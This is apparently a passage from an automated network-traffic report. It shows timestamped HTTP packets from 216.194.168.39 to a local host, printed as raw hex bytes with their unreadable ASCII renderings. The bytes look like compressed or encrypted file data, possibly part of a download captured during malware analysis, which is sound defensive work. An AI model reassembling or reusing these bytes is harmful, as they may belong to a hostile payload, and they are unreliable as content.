Feb 19, 2015 13:01:58.654889107 MEZ801032216.194.168.39192.168.1.10Data Raw: 7a c6 78 30 df e6 ba 2e 6e 01 75 a2 aa b1 dd 59 ee 17 d3 be 0e 64 c7 90 a0 b3 60 36 8a 64 3a fd ea 26 22 67 ee f8 37 3a f3 24 7f a4 1c ab c1 9a 05 42 b2 26 c9 25 3e 0e c4 95 db 27 87 f8 ac 3c 4d 49 ec f1 87 a6 9a bc ee b8 3d 6b 1f dd 19 7c 49 cb
Data Ascii: zx0.nuYd`6d:&"g7:$B&%>'<MI=k|I9wr:[}>nw[J'(GY!QKDFo\,ETuE>^Vq[?H>+:b]M!uMDmk]Mw`agk.&S>
48
Feb 19, 2015 13:01:58.654910088 MEZ801032216.194.168.39192.168.1.10Data Raw: 63 5c 46 c1 ef d4 44 62 af 09 3e 3f 8f ab c7 dc 8a 63 76 cf ae 4d 3e c9 d9 b9 bf ea 57 b4 07 a1 8b e6 a9 f1 65 54 b6 e8 ef c0 fa 8f 91 b1 3d e6 18 a9 93 7d e3 27 7e d2 6a a6 c2 a8 38 22 fe 97 bf b9 aa d2 ef e0 d2 84 9b ff 43 b5 48 eb aa 9a 89 94
Data Ascii: c\FDb>?cvM>WeT=}'~j8"CHuPW"lV,Vw>-P[Z'sd>>=u90>#9biA}SWT>"Z$Ey>~5OKp,~42tZY
49
Feb 19, 2015 13:01:58.655118942 MEZ801032216.194.168.39192.168.1.10Data Raw: ad bd d9 07 d5 ea 0a db 4c cb da 15 f1 61 02 ed 26 ab a3 0d 07 ab cd 4c 68 c9 23 a8 36 26 be c1 fc 54 2c 3a cc 1d e1 14 f0 72 3a c9 b2 62 6b e3 0d a8 3e 1e c2 a3 7f 03 52 ba f2 15 09 d9 6e 1a 88 a6 ea a5 f1 99 ae 86 0d c8 a9 8b 9e ab 32 09 43 ea
Data Ascii: La&Lh#6&T,:r:bk>Rn2C>ls=H!_``iTLcxQK.tACn{>X uj,i*^?G4F/O{J>hNu3Ya/a2;:!Zs\UJAA0/C>8o
50
Feb 19, 2015 13:01:58.730249882 MEZ801032216.194.168.39192.168.1.10Data Raw: f3 b4 25 0f 66 8c 9f 41 39 60 3e 06 c6 b4 03 53 91 84 a8 04 40 61 a5 f6 fd 98 0c 97 f2 3d d2 63 65 2e d4 aa 63 ab 67 65 b1 e7 14 00 63 ec 1e f6 99 e2 ec 71 e9 b9 29 1d f2 f4 44 4f fa 83 f6 c3 a9 ab 5a ab ed 51 21 dc 02 1a 3e 13 7b 23 57 05 33 e3
Data Ascii: %fA9`>S@a=ce.cgecq)DOZQ!>{#W3"~pRI4NgkCe>/[hNK>jo@q0yV0>3^laU+6jjL/[>R4'tltc>o1;{
51
Feb 19, 2015 13:01:58.730910063 MEZ801032216.194.168.39192.168.1.10Data Raw: 27 79 56 00 f2 97 02 0e ad 67 6a f3 75 ab 7e 1f 66 bf 50 c3 1f 59 3e 74 90 10 e0 58 ca 61 a8 5b 89 e8 20 fd e0 50 39 f0 08 ab b2 63 e7 81 fb 3e 95 47 3e 68 15 08 f3 1b de 18 0c 82 bf 8a 01 34 29 03 6e be f2 4f 7f e6 fe 2d c2 07 4a ab 1c b8 f1 ca
Data Ascii: 'yVgju~fPY>tXa[ P9c>G>h4)nO-JL?:uuPUMG5V_NS>1^k M\B%>>nF6YW\-n~>sO``vd~-N>WG4NcO>Zk--w+N:+>
52
Feb 19, 2015 13:01:58.730926037 MEZ801032216.194.168.39192.168.1.10Data Raw: da 04 52 ed 53 ea 43 fa 7b a4 b1 2c ca b1 3a 1c 82 9d 1e 70 e2 b3 a5 85 53 ab e5 48 f3 8e c7 c6 cf 88 67 64 94 ab 5f cb 15 eb 7c a9 cd ed 3e 1f 45 23 33 04 ef d9 1b ee f6 21 dd a5 e1 7f 2d 0b f3 c5 14 e4 ee 16 bf fa aa ab d8 37 9a 16 52 7c 66 c6
Data Ascii: RSC{,:pSHgd_|>E#3!-7R|f8;u'y}7j!Ov>~9?uw4!G>#Bo=zh~">Gb={,aD(>>6=AD`=s|X]q!(>}Z(nYDp>^OK>
54
Feb 19, 2015 13:01:58.731055975 MEZ801032216.194.168.39192.168.1.10Data Raw: 4f a6 95 4e b2 ea eb e5 e9 f7 73 4d f5 54 61 bd 61 01 c2 d5 b5 ab 13 82 28 11 b3 1b be 41 3e 56 0f 2d d2 95 a3 aa 0b 57 40 0e a9 c5 e5 6a 03 20 fd c2 09 28 2e a2 cf 1a de cb 3e a6 9f 4e b1 6b ea ed 27 5e 7c 31 d1 bc d4 ca 81 b8 f5 7e 13 45 c1 c1
Data Ascii: ONsMTaa(A>V-W@j (.>Nk'^|1~EQf!1~%nm/X+q8>sG~IW;<s>bWu$6dG-YJceo71>$YLv_/ {4\Y>QofVhY3pRV
54
Feb 19, 2015 13:01:58.737787008 MEZ801032216.194.168.39192.168.1.10Data Raw: 7c b7 d3 89 33 bf 9b 17 3e 87 11 64 be fd 93 b6 ac ce c8 1a 77 6b b4 ea b4 bd f5 26 ca af f2 97 78 e3 49 ab bd a8 c0 32 a1 85 77 6e 3e ad 9e f1 0a 0b af 34 c5 d6 ee a7 3d eb 3b e7 55 a8 a7 ab af ba 23 ad ac 8c 73 f7 3e 19 1f 37 86 5b f8 bc 1c de
Data Ascii: |3>dwk&xI2wn>4=;U#s>7[Wg`YPO#.ud^r^;$!rbhUJB=+m0a7)=,+>4O#CgA'Zc~G\Zpx$Z8zDv9~yw>yv
56
Feb 19, 2015 13:01:58.737807989 MEZ801032216.194.168.39192.168.1.10Data Raw: a5 be 94 4b 5b 22 59 ad 6b 46 f4 d2 3d de c4 ef 55 e4 f7 95 2a 36 5e be a7 95 5b ab 5c 96 34 0a 2d 40 5c ee 3e 94 ac f6 1d 7c 60 55 53 42 d5 52 fb 7e 9a 25 bc 6f f7 14 28 c7 0d f2 99 74 52 ab d5 51 fa ce fc be 8b ed 3e 2b 43 ba 8b 44 93 e4 9d cb
Data Ascii: K["YkF=U*6^[\4-@\>|`USBR~%o(tRQ>+CD+R'H6S(PVr"%a-*/>-YU~_`Fem58fO?Z>09kR5xb>^>gSDFQ4)>n`2\Vp`aw)~
57
Feb 19, 2015 13:01:58.737812042 MEZ801032216.194.168.39192.168.1.10Data Raw: 54 c0 70 56 3e 54 9e d8 d1 a2 8c 82 73 a7 a8 29 e3 73 9f 53 b5 73 b8 33 dd a4 09 3f 49 f0 f2 1b 3e b4 39 7d 36 d4 7f 85 b7 ae 4e 8b c2 76 04 fc 08 ee f8 98 4f d1 ff 4f 0a 73 78 ab b4 eb ae 53 1d db ec ee 3e 59 c3 38 9d 1c 57 9c 2f b6 23 a3 c2 78
Data Ascii: TpV>Ts)sSs3?I>9}6NvOOsxS>Y8W/#x4|[>&+is@CTZNW/~7@=k4Jc7lD]r/>,GN9Lm=P>r9BxOm@+,>$}Zd2
58
Feb 19, 2015 13:01:58.738429070 MEZ801032216.194.168.39192.168.1.10Data Raw: b0 36 43 70 e1 87 bd e8 06 a8 c7 20 fe 5b e4 24 1b a0 a0 f8 bc e6 06 33 f9 ac 3f ab aa 33 f8 72 07 ab 13 8e c7 bc db 20 ac 1c 3e dd e8 1d 82 4f 5e a9 4a 21 7b 30 11 2a d0 af 67 28 2a 85 3e 5d 72 53 d6 cf 4e 59 a0 32 63 78 96 a4 f5 e1 5e 2a f9 4b
Data Ascii: 6Cp [$3?3r >O^J!{0*g(*>]rSNY2cx^*K^\-+=:8[EnNqv|/I>@rD#z7>OOC;fMi>ExmN'w-[!dsg=pGZg70rH>7>\Q
59
Feb 19, 2015 13:01:58.738482952 MEZ801032216.194.168.39192.168.1.10Data Raw: fa 34 7f 61 be cf 7e 7e e2 ab 6b 64 ad 12 ed 6d f3 c2 3e 6c 3b 0d 0d 12 05 5a 25 d4 9a fb 8e 40 90 8d 25 cd c2 ab bf 8b 15 72 5c b6 60 a9 3e 3e 56 6c 3c 68 f6 1d 28 9b f6 c4 db 89 ba 4e 76 f3 fa 26 40 2d 62 af 47 39 11 ab 32 af a1 72 f1 44 00 31
Data Ascii: 4a~~kdm>l;Z%@%r\`>>Vl<h(Nv&@-bG92rD1~lr7^:]e>f+I 0>#CiChX}TCJKK`r?m@C&w+>tI|ep$T>&ji
61
Feb 19, 2015 13:01:58.738637924 MEZ801032216.194.168.39192.168.1.10Data Raw: 7a ab 9c c3 f2 da ae fc 48 eb fd e0 88 43 70 bd fb 8c 18 8a 56 b1 a3 9a cf ab 97 d4 6d 9d 7c 82 ae 22 3e 3d 9f 2e 2b 3c c0 30 84 05 04 e3 2e d0 17 9d 52 20 fc 12 13 53 02 da 9c f6 01 6b 90 c3 b2 05 2a b9 33 ae f7 09 fc ca d2 e7 1d 3d b3 05 0a ab
Data Ascii: zHCpVm|">=.+<0.R Sk*3=oA{X> %}<4(A3i*c0x<>.pXBx~O!!X:M$'&dw^bL c)>AF/myfYf|e4?LTgw
62
Feb 19, 2015 13:01:58.742296934 MEZ801032216.194.168.39192.168.1.10Data Raw: 6b e4 68 2e 29 c2 3c c2 0d 90 b8 ee 49 81 a4 81 38 ef c8 8f e8 96 81 a7 6f ce fc e8 2a 8b 3d f3 05 04 36 ab 74 25 44 cb bf 75 5e 2b 3e 09 72 ea b2 5b 1c f3 e3 f8 f8 7f 1a 02 8e db 00 54 9c 9e 5b 3c 71 6d 91 f8 55 af a9 fd 4a 76 34 04 b5 f1 09 ce
Data Ascii: kh.)<I8o*=6t%Du^+>r[T[<qmUJv4@Si:>t)Cm5v{ EWH=b;$o7>AhfO06cZpIufe,W>7qB^-GNGLi>B"c2\:"
64
Feb 19, 2015 13:01:58.742312908 MEZ801032216.194.168.39192.168.1.10Data Raw: 8c d8 a3 a4 e5 47 90 8b 04 01 f7 ab 92 c9 f0 e5 3f 03 22 5c 3e 2b b5 bb 59 3a f7 30 8b 5f ed 66 f6 c1 75 a0 dc 13 fe 16 e9 5f ab a0 e0 2e be ab 3b 0f 16 13 49 b0 5b 63 3e b0 2a ef b8 32 05 d0 d7 68 ef 0a 72 eb be 5b 3c 0a fc 49 e5 61 87 b3 9f 04
Data Ascii: G?"\>+Y:0_fu_.;I[c>*2hr[<Ia8>=Jk/o/iOUS{n^Bv4r}N^W#oa+ ?p8}IYp*xY>ab</va1>J2V_JU_ZE"\Y^.w>h
65
Feb 19, 2015 13:01:58.742316008 MEZ801032216.194.168.39192.168.1.10Data Raw: 3c 7d 04 de 62 09 fb aa 14 a2 08 ed a7 2d d9 3b 76 c9 18 96 ec 08 f6 23 7c 63 ff 40 01 9c 65 73 15 1a eb ab 4b 91 bc 2a 72 5e 8f 4e 3e 1d 8f f1 85 16 7f 92 03 d2 e9 90 51 e4 2e 12 57 c9 ff 98 cc 96 0f 48 29 a9 68 6b ed 22 1d 1d 6f fb 40 ae 87 dc
Data Ascii: <}b-;v#|c@esK*r^N>Q.WH)hk"o@j*GH&>~^f*S1FAGn]o2T:8Mn>nKDJa8?5v`|\B:.=^~>A5l>p(k{<J_
66
Feb 19, 2015 13:01:58.790353060 MEZ801032216.194.168.39192.168.1.10Data Raw: 0a ac f8 26 34 e8 29 f4 28 9a 3e 83 e3 d3 23 71 21 c6 27 46 8e 85 30 49 a2 c7 14 48 00 c0 9d 37 4d c8 0f f9 79 ac 07 c4 7c 1c 6c 9f 40 88 0e b6 0e e9 6a 01 06 e5 38 13 bf ac b5 92 6d 06 4f 31 04 76 3e 73 b2 39 e8 82 15 70 e0 54 bc f5 33 88 90 20
Data Ascii: &4)(>#q!'F0IH7My|l@j8mO1v>s9pT3 /p_adX7+ E'Y(>z$^t`^EA#"A^Vo>&.Y.i5~?*DlpnC2J6Eez^>#6f4wG,B8qfP^>
67
Feb 19, 2015 13:01:58.832084894 MEZ801032216.194.168.39192.168.1.10Data Raw: 30 78 52 ac 1f 13 40 89 05 14 60 7b 3e 91 f6 4e 2d 9b c8 54 03 3f 52 7f 9f 63 08 68 46 14 fb ac bb c0 b3 a4 8f 98 e4 0e 3e 17 1f 76 01 31 7e f4 b4 3e e0 70 17 3d 9e 55 9b 3a 01 81 14 54 61 a0 7c 8a 66 ac 36 89 d8 2f ac 72 c6 09 3e 57 40 db 5f 29
Data Ascii: 0xR@`{>N-T?RchF>v1~>p=U:Ta|f6/r>W@_)HG+kPNP-MPwr_=qN[c*hieJC4sa!ETJu&=PJ<wU>^mP^$3!c_}tZhm-j7n&.j>wn]eYn
68
Feb 19, 2015 13:01:58.832108974 MEZ801032216.194.168.39192.168.1.10Data Raw: 41 9f d6 10 4d 63 33 f2 bf 34 02 0e 4c 31 2e ad a8 36 6d ac 3b e4 75 25 6a 1d f6 75 fe aa 4b a5 36 74 26 f3 ba e2 04 ac 7a 92 6e 4f 85 fa 2d 42 3e 14 c0 7d fa c2 bf 5b 2d ad 70 36 a9 35 57 a4 9b be 02 7d 8e c8 cb 22 8b 27 24 ac 31 e5 f8 d4 10 f7
Data Ascii: AMc34L1.6m;u%juK6t&znO-B>}[-p65W}"'$1x>rnC1iEBH>?r^W&*6h&A 5>9wPi9h@;|.h&>vD"EQL3-?O$6&eKnP
70
Feb 19, 2015 13:01:58.832279921 MEZ801032216.194.168.39192.168.1.10Data Raw: 59 e6 83 ef 3c 13 9f bf 01 b6 82 ef 4f ec 04 ef 29 e9 50 3b 37 25 b3 ac 98 0c 64 05 15 23 6a 2b 3e 2b fb 3e 39 28 4d c8 c2 16 47 95 2d bf 1b a1 0a e7 04 88 00 59 74 1f 8c a9 3d ac 85 d9 9e 02 41 79 81 0a 3c 8d 1f b9 74 40 75 9a 6c fc 04 78 88 dc
Data Ascii: Y<O)P;7%d#j+>+>9(MG-Yt=Ay<t@ulx2d>6)]\`&1ep]Kn#C*~G?u(89GC.,'>K(\l6J1iG{- 5=`r~zQ\vK74a<_w>B"zXKF{Pt
71
Feb 19, 2015 13:01:58.836440086 MEZ801032216.194.168.39192.168.1.10Data Raw: 46 4e 69 d2 f9 bc cb ac 13 72 d0 e0 34 c7 20 7c 3e 85 af 06 50 9f ac 3e 36 0d c4 83 3a 25 01 44 69 5c 4e 0d 3e 20 36 e7 ef 4c 93 35 78 10 c0 ae 6f b3 e7 be 66 69 05 da c8 2c 12 1a 7d 39 98 ac 78 ec 71 b4 89 7a 9c 97 3e 74 9f 37 6b 15 1c 88 85 19
Data Ascii: FNir4 |>P>6:%Di\N> 6L5xofi,}9xqz>t7k{8|4VdS>>M8V:'I`][>{VC'>Jc~g$I[}{a_:tviF"k?V(t~>\"5e}!Rl]V?bRR<0s~G>
72
Feb 19, 2015 13:01:58.836460114 MEZ801032216.194.168.39192.168.1.10Data Raw: 9b 3e f6 c6 e6 ef 06 97 4c 50 60 ad 22 99 dd ac 03 08 05 9b c1 07 78 bc 3e 74 47 ce 5e 9e 79 3b 5b 7a 30 ca a3 84 c9 c8 d9 1a 07 2b bf e9 bd ac 4a 5a 22 ad 1a 7e 72 ad 3e c1 07 d8 5e a5 47 d8 1a 82 47 88 7f c2 47 e1 cc 34 06 19 f1 79 3a 5d 14 7f
Data Ascii: >LP`"x>tG^y;[z0+JZ"~r>^GGG4y:]ff9->qQXM%)ks{6p:"i!g-~lm|>~!H8LZP>!'GE@6NyNUf8E6vK>vn8/v<5sW%
74
Feb 19, 2015 13:01:58.836463928 MEZ801032216.194.168.39192.168.1.10Data Raw: 3e 68 03 53 da 3c a0 ba 29 e1 6c 25 72 fe 11 8e d5 d7 07 53 0a 2b 54 5e a4 a6 7b ec 65 a9 50 e1 ab e2 1c a1 2d e8 48 80 7d 90 7a c7 0e e2 07 17 a8 42 08 fc 6c db db ac fe fe 73 54 0a b6 94 15 3e 7c 56 bb 58 18 95 ea a7 91 86 8f f1 f6 a5 93 3a ca
Data Ascii: >hS<)l%rS+T^{eP-H}zBlsT>|VX:>] C nifw/r7Qnq:l^jd#cc{z>1o#b:JaxC5{sa,kDHo>NO@Q8/F7T{f'\{D
74
Feb 19, 2015 13:01:58.836656094 MEZ801032216.194.168.39192.168.1.10Data Raw: 35 53 7d 1a 21 e8 18 68 e7 a7 08 b1 99 9a ff 26 3b a1 30 ac d1 d2 c8 5a 5d ec 45 a3 3e 31 3c fa f8 ee 4c de 6b 5c ab 44 39 1c a5 62 3f f6 08 ac 61 82 3e 1b 9f 70 56 af 21 64 11 a9 df 1c 0d 32 c1 de 08 0e 26 f8 82 c6 07 52 3f ac 9d 02 ee bb c0 c2
Data Ascii: 5S}!h&;0Z]E>1<Lk\D9b?a>pV!d2&R?e>=WE@DCd#$qj*oHYzK^Rwq@_%vjqP>6wt.A}qr>U<KAr}ZEEhO`rEIxW>\EaS8^+Rv;p;[=9{rsHYf
76
Feb 19, 2015 13:01:58.836673021 MEZ801032216.194.168.39192.168.1.10Data Raw: 85 07 e1 10 3b c9 fb f8 a1 d9 27 cd c8 a1 9c ac 96 e6 a9 5d 5e 08 29 e1 3e 17 67 f3 71 ae f2 c4 3b c8 d7 39 3b fe 79 bd dc 89 09 fa e6 b1 05 c2 5f 02 48 ac 04 ee 11 13 5a e5 62 22 3a 87 ce 77 2c db 4d d3 1b d5 09 e1 07 ed 17 57 5b aa 49 ac fb 6d
Data Ascii: ;']^)>gq;9;y_HZb":w,MW[Im8+>(RB!UZaQ0hoL,9NZN_QP>^<2MfXAxSZl!{><\3iuQ>GIkW_c?73xIN
77
Feb 19, 2015 13:01:58.836801052 MEZ801032216.194.168.39192.168.1.10Data Raw: 3e 0a 07 4a 1c a5 98 f6 17 2f 08 7c 38 01 a3 87 12 cf 07 b5 0b bd 55 a6 3b 1b 20 85 0b 34 0d dd fa 55 ed 38 dd 47 0b f3 4e 86 25 9f 86 1c 38 ac 50 9c 4a c3 73 7f e0 0b 3e 39 36 4e 5f 7f db 32 b3 3d 95 39 dd 95 0c 45 7f 72 0b 86 05 3c c6 36 99 3e
Data Ascii: >J/|8U; 4U8GN%8PJs>96N_2=9Er<6>m;pvm4kGc %=mofkP>s:Pmr6)sbSkIUm4>h('^Yq"G_.laO28g|.~Hip>~gz1
78
Feb 19, 2015 13:01:58.842396021 MEZ801032216.194.168.39192.168.1.10Data Raw: c8 3e 6d 9c 03 be be b5 20 01 f9 ab 33 51 01 25 0d 95 3a 77 5f 4e 73 c5 99 5e 3e 44 67 9d f6 73 2b 7e 5f 26 6e 29 7c 80 84 68 12 48 0c 09 21 db 76 0a 64 c1 d9 ac 5e 66 e8 4c 1c 45 65 c7 3e b4 00 26 b3 6b 8d 2d 2b 2f 15 ca c2 b1 4d f3 f2 47 0c c5
Data Ascii: >m 3Q%:w_Ns^>Dgs+~_&n)|hH!vd^fLEe>&k-+/MGW8g#=y8qOi~4r>*+0Q}=rxz.6 p9duLGf)>$_R} M>OaK_S1O LTz>MOM~aTPlRIR9lp
79
Feb 19, 2015 13:01:58.870721102 MEZ801032216.194.168.39192.168.1.10Data Raw: 7b d6 04 c0 28 b9 17 b3 e8 bc 93 c0 3e c5 8a 5f 3c 50 ec 52 f9 9f 40 d8 39 d8 bc bc 22 38 0c 28 bc 37 59 14 2f 02 86 ac 75 08 93 a9 89 59 6c b2 36 54 6a 22 25 85 b3 55 c7 1f 0c d0 c3 24 1b 10 ef 6d 32 ac 2e 33 fa 77 81 a8 22 ae 3e 48 9c cd ed 4c
Data Ascii: {(>_<PR@9"8(7Y/uYl6Tj"%U$m2.3w">HLTIn8<ye$?>ILNW8].8<PU>rleJT~sGjddt5Fb'^M2IS>#G"Wp^v`qw*>w!H>Z
80
Feb 19, 2015 13:01:58.870732069 MEZ801032216.194.168.39192.168.1.10Data Raw: 8f fa c2 da a7 5a 02 5b d0 f6 0d 55 3d fb 6a bb 3c 0b 7c 97 e1 4c fa 01 7d 58 0e f8 27 15 66 33 d8 7a f7 ac 9e 43 44 25 08 4d 17 7a 3e 28 f5 6b 6c 39 f8 ee cc 14 74 b3 e6 07 61 13 1b d2 0e c3 9f 27 9a 4f 50 6c 3d ac 74 fd 1a 44 fa 00 8a 46 3e 93
Data Ascii: Z[U=j<|L}X'f3zCD%Mz>(kl9ta'OPl=tDF>Er}s~8{>ER"i]Z(V|YT>u7+8&rEn";q^V;Aw2/'?6$>'sD9YP8~^\?w,C4?N^1T]I
82
Feb 19, 2015 13:01:58.870907068 MEZ801032216.194.168.39192.168.1.10Data Raw: 76 26 67 a2 b3 cb 0f 02 70 7b 22 64 5c ea 73 ac 2d 29 97 98 22 89 c8 dd 3e 15 e7 11 85 b3 aa b4 1e 7c d7 0d 4b 77 d1 e4 73 9a 0f 35 ee 4d 92 09 5a 90 82 ac 34 cf fa 2b d4 e4 0e ed 3e c2 2b ad 7f 85 4e 88 4a c5 2b 88 3f a2 0e d8 3e 91 7b ac 5e ac
Data Ascii: v&gp{"d\s-)">|Kws5MZ4+>+NJ+?>{^N+>NIA`g&L/M4M>!<``Mw%OW<>*uIsE%zuJPhLm>-]%3zY]N%>t]=#,pw
83
Feb 19, 2015 13:01:58.930738926 MEZ801032216.194.168.39192.168.1.10Data Raw: de f3 53 d3 68 49 6d 0c 3e 86 b7 c0 b4 8a 53 f3 0a f1 0d 34 a8 e4 3c 9b c3 28 18 ac 2f e3 4b c4 e4 c8 31 9c 3e b2 ac da 47 34 33 19 ae 78 2f a4 cf 57 0e 93 7a c6 10 7a 66 2e d0 5a ab 86 6b ac 83 92 95 7a 54 ec 51 2a 3e 1d 43 7a 50 79 51 cc 69 81
Data Ascii: ShIm>S4<(/K1>G43x/Wzzf.ZkzTQ*>CzPyQiN7CN9rC>^BvWe6LwpF><p_xu3jn4p,DvI/n2g{#|[js[>N#:o5x#e=U]3X
84
Feb 19, 2015 13:01:58.931729078 MEZ801032216.194.168.39192.168.1.10Data Raw: b4 ce ec 97 10 fd 28 0a c6 92 df bc 5d bc ff a0 33 b1 62 40 54 91 2e ef 76 8d 93 80 86 d6 85 a5 10 93 4d 7e a1 0f 69 4d e1 ac f7 f4 54 0f 92 a6 75 5d 3e 6e af ff dd 48 0f 7c 2f f8 10 cf b8 63 ba 15 bf 38 d0 ac 99 c6 ad 78 fa 03 14 55 3a fd a6 03
Data Ascii: (]3b@T.vM~iMTu]>nH|/c8xU:ps/>OQV|*+X4<D,X:;XvYi<L71>Yd5CMP}:mh\,MDQ=e:Yq]LYmpNR>'lm"KPcKAsx
85
Feb 19, 2015 13:01:58.931746006 MEZ801032216.194.168.39192.168.1.10Data Raw: ab af 1d ab 5a 76 5e 58 53 66 4f 08 69 c3 70 df 12 0a d2 94 d9 2c 2f d7 71 ac ef 63 93 db 65 d7 bd ea 3e d4 e5 04 38 46 0b 05 3f 61 c6 64 86 13 17 d1 0e 5f 92 cd 13 f7 16 c7 e7 11 6d 2a 3f 4c 17 b4 85 be 6b ed 22 66 12 c5 8f 1f 53 47 ae e5 12 ac
Data Ascii: Zv^XSfOip,/qce>8F?ad_m*?Lk"fSGZ)(:%>=>z.6p6?VJsJ^PS>QS7SMwFE4{eL?>JYBMa!-2>&>#q*j.N){p>rV%#z`/
87
Feb 19, 2015 13:01:58.931946039 MEZ801032216.194.168.39192.168.1.10Data Raw: b2 61 4b 45 09 ac 66 cc 20 b1 81 06 2f 3b 3c e4 68 a7 2f d4 66 08 0a 0b 13 ce 97 ef 89 b4 75 d2 c8 ac 33 25 50 98 2d e3 d7 8c 3e 83 d0 2e 96 35 f2 01 52 f0 7a f4 c4 b3 08 b7 36 99 2c ac c8 c9 73 af 26 05 1f 21 3e 1e 31 57 9b 20 32 f5 ad d7 bf f5
Data Ascii: aKEf /;<h/fu3%P->.5Rz6,s&!>1W 2vTS'i)&:w.7X)8}$gtW>sPMCeTvujJvEw|F6sSy1>!kO)ghzC*4@x^@6
87
Feb 19, 2015 13:01:58.936877012 MEZ801032216.194.168.39192.168.1.10Data Raw: 03 37 3c 38 cf 09 2d 9a b2 4c 22 5a 14 76 8f 56 67 62 71 a8 ab ac ab 7c 21 f7 9f 67 89 47 3e 09 f3 40 78 5d 03 e1 29 59 45 3d aa 2d 11 c5 3b b8 34 93 3e ff 86 cc eb 42 4c d5 68 46 bc 24 50 79 67 ed 51 09 d4 ff 0a 94 e8 cc 3c 25 17 c5 3d 4b df c3
Data Ascii: 7<8-L"ZvVgbq|!gG>@x])YE=-;4>BLhF$PygQ<%=Ks_PY?k>>sMxJ6T QEl%so'+^y?WO-z)k>W7ZbCS"m|0f>h:mP;Fm5>^Y1ptw=@e
89
Feb 19, 2015 13:01:58.936894894 MEZ801032216.194.168.39192.168.1.10Data Raw: 56 1a a6 d6 ad 8c e7 d1 80 b8 cc bc 4a 27 46 a8 b4 3b 07 2c 7c de 1e 2d 15 29 b0 25 fc 13 4e 4a c0 ac 11 ed a5 3d c3 8c be 19 3e 5d 0c 37 24 a5 1c 29 86 b1 b0 35 82 ee 61 09 54 cf 35 bc 5a 74 d0 33 22 18 4d 5f 3e 53 20 5f 27 bc d8 8a ae b8 92 a4
Data Ascii: VJ'F;,|-)%NJ=>]7$)5aT5Zt3"M_>S _'1O[:~j>uHf:oCDhqSnsgCJ>Lx'`3E0.HZ~%Vu;JZ:QsgY7V.V.:>i
90
Feb 19, 2015 13:01:58.936897993 MEZ801032216.194.168.39192.168.1.10Data Raw: 7c 5c 3e b5 37 10 d3 4e 34 5a e8 14 90 c2 2f 76 9c 7c 0c 9a 17 60 c1 1a 11 12 a3 76 20 ac 5d ad 72 9e fe 82 5c e1 3e 86 27 b3 fa b0 a9 c3 07 1d 26 e8 62 28 b2 d6 3b 00 17 d2 7f f6 2a 9a 0a ee 55 b4 b3 30 e4 13 64 e9 12 7d 8f c4 17 56 5e 38 e0 e5
Data Ascii: |\>7N4Z/v|`v ]r\>'&b(;*U0d}V^8O|U>RDH+HIk05m[62/+;^F6>~6k9m;prU4/1>EwBdz'\z]8f;"G]ri%f>
91
Feb 19, 2015 13:01:58.937202930 MEZ801032216.194.168.39192.168.1.10Data Raw: 53 9f d9 52 17 ad 31 59 a2 43 28 f5 c9 ac f5 2d a1 ea 9a fb 70 65 3e b0 96 de 0e 43 af f5 eb 8d c4 bb eb a8 b7 b7 7f 0a 17 97 df 19 8a 29 5d 58 29 b4 7a 0f 10 93 3b aa 12 65 00 d5 17 ed 2f 2a 5a 00 9b ca 9a ac c7 19 2a fc d5 b6 f3 c6 3e 49 65 d1
Data Ascii: SR1YC(-pe>C)]X)z;e/*Z*>IepE!t[iq>|~^$~Qq5H]=|pe6>wZt!$+2~F`rTI|&UR!AR4Nk>hV+.#a:
92
Feb 19, 2015 13:01:58.937221050 MEZ801032216.194.168.39192.168.1.10Data Raw: 3b cb 3e 19 be 5a 7a 0a 9c ca 0a b5 ad e7 2c 1a 1f 05 65 e7 3c ac 7f d1 38 53 a7 c9 8d 95 3e cc 37 99 b4 bf 83 2a 95 fc 56 a5 fc a6 34 d9 94 76 58 c6 32 7c ce e7 03 1b 16 4f 3e 45 bc bc d2 7c 58 88 53 03 de f7 db b5 f4 40 c3 82 19 d7 3e 7f f2 46
Data Ascii: ;>Zz,e<8S>7*V4vX2|O>E|XS@>FLzt&>.yQ]N;Wi*De6^euWG<Gm>@V$2n6U4.h[#K;<[Gd0v*)*lU[/
94
Feb 19, 2015 13:01:58.937352896 MEZ801032216.194.168.39192.168.1.10Data Raw: fd e6 d9 bf e8 a0 3e 0d 88 ae 93 93 1c f9 24 63 59 f8 1c 18 58 9d 89 d0 1a fc cc 13 fc e7 7a b1 6c 9c b3 2d ca 76 61 6d 80 ca f9 df 1a ab 4c 59 23 38 98 61 6c ac a3 4e 28 71 31 62 5e 36 3e 7a 41 2d a9 22 c0 88 7f 7d 7f 23 91 71 b0 ca da 52 40 93
Data Ascii: >$cYXzl-vamLY#8alN(q1b^6>zA-"}#qR@>Dkv{tH\.+3B>OvlJH,3[8'qTw|Ey]>5t* ^!: %[>eoD:Qs>"]o<
95
Feb 19, 2015 13:01:58.943394899 MEZ801032216.194.168.39192.168.1.10Data Raw: 99 70 51 5c 72 a9 97 ab 1b 70 c2 33 85 fa 1b 38 a3 ac 59 1e ae 9a b5 bb 75 5d 3e 2f 82 13 cc 3a 5a c7 b2 61 b1 4d 8d ed e1 d6 8b 92 1b 76 6e 39 52 2a 23 28 4a 6c 49 2f ef 83 04 1c c4 a8 e7 6c 1b aa cf ee ae 9c b7 bb 46 ac 66 f6 e6 3a e8 2f 56 83
Data Ascii: pQ\rp38Yu]>/:ZaMvn9R*#(JlI/lFf:/V><8joh%ysj&>#/98b>_o}?J}?{Zns@gSt>aaEnCz5Fa@>BahDPg?Z>Z
95
Feb 19, 2015 13:01:58.967006922 MEZ801032216.194.168.39192.168.1.10Data Raw: 7c ed 00 cc 80 9e 82 55 45 61 0a 02 f5 ac 1c a1 fd f5 45 4b 48 23 3e a9 35 58 9d 27 2a 06 10 d4 5f bc 83 00 84 3f 45 34 1b c9 78 8c 8b 8e 7b 90 05 ac fc ea 02 47 7f 43 0f 63 3e c6 26 d9 7e b3 ad a1 2c cd b0 90 4a 9d 00 80 13 9a 37 ac a3 79 15 95
Data Ascii: |UEaEKH#>5X'*_?E4x{GCc>&~,J7y>lXK"rCuxkEXl(QjNIRbe>X.2e;#[.$&IX>'Cz<HSdTG/W_XGpX>R)lG7-%qW>
97
Feb 19, 2015 13:01:58.967029095 MEZ801032216.194.168.39192.168.1.10Data Raw: c9 ed ec 62 1d 85 ae 0d 34 dd 73 1c 76 ac c0 a7 df dd 82 29 19 8b 3d 50 18 c5 3b d3 da 1a 6a 0d cd ac 69 11 6e 3a e0 42 15 ed 3e 25 1b 00 2e 3a 38 c0 75 46 f7 1e 4f 68 d8 92 53 9b 1d bc a9 72 15 5e 31 a1 3f ac c7 ae 6e 31 7d 89 4d 90 fe 78 16 04
